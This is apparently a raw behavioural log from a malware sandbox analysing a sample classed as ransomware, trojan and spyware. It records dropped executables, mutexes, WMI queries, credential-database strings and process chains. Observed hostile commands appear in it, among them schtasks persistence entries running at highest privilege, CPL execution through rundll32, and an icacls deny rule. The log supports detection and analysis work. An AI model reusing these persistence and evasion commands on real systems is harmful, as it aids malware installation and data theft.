                      Source: 0YXJTGaxIrryNdvx7SKozTjt.exe.0.drStatic PE information: Section: .reloc ZLIB complexity 1.5
                      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@110/214@0/27
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_021707C6 CreateToolhelp32Snapshot,Module32First,7_2_021707C6
                      Source: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeFile created: C:\Program Files\Windows Media Player\background.jpg
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeMutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_11
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeMutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_15
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
                      Source: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeFile created: C:\Users\user\AppData\Local\Temp\trixyLYB3bTQWTO7UJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCommand line argument: 9~uN7_2_0040177E
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCommand line argument: r7_2_0040177E
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCommand line argument: E%os7_2_0040177E
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCommand line argument: ?<l-7_2_0040177E
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCommand line argument: z&i>7_2_0040177E
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCommand line argument: 8*@7_2_0040177E
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCommand line argument: 8Y<67_2_0040177E
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile read: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2052702628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2412636025.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2613733095.000000000063D000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: CHA0VZiz8y.exe, 00000000.00000003.2052702628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2412636025.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2613733095.000000000063D000.00000040.00000001.01000000.00000013.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2397688403.0000000005AFB000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2416564866.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566336684.00000000061C3000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566643344.00000000061C3000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2605527906.0000000001CA3000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2513685356.00000000010BB000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2515034544.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2514374481.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2514670830.00000000010B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: CHA0VZiz8y.exeReversingLabs: Detection: 39%
                      Source: CHA0VZiz8y.exeVirustotal: Detection: 41%
                      Source: 7U1bGcxK3Lqi_XMHDNEdJrhB.exeString found in binary or memory: set-addPolicy
                      Source: 7U1bGcxK3Lqi_XMHDNEdJrhB.exeString found in binary or memory: id-cmc-addExtensions
                      Source: unknownProcess created: C:\Users\user\Desktop\CHA0VZiz8y.exe "C:\Users\user\Desktop\CHA0VZiz8y.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetSvcs -p -s NcaSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exe C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exe C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exe C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exe C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exe C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exe C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exe C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exe C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exe C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exe
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp "C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp" /SL5="$4042A,5528781,54272,C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeProcess created: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeProcess created: C:\Users\user\AppData\Local\Temp\kat806.tmp C:\Users\user\AppData\Local\Temp\kat806.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess created: C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exe "C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exe" -i
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exe .\Install.exe
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",
                      Source: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exe .\Install.exe /jfXIEdidloJv "525403" /S
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\cd606818-a84b-463e-828b-b93214ba547c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exe C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exe C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exe C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exe C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exe C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exe C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exe C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exe C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exe C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exe C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exe C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exe C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess created: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exe C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeProcess created: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exe C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeProcess created: C:\Users\user\AppData\Local\Temp\kat806.tmp C:\Users\user\AppData\Local\Temp\kat806.tmp
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                      Source: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp "C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmp" /SL5="$4042A,5528781,54272,C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exe"
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeProcess created: C:\Windows\SysWOW64\control.exe "C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exe .\Install.exe
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess created: C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exe "C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exe" -i
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpProcess created: unknown unknown
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\cd606818-a84b-463e-828b-b93214ba547c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeProcess created: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exe .\Install.exe /jfXIEdidloJv "525403" /S
                      Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\eKhLlZQ.CPL",
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
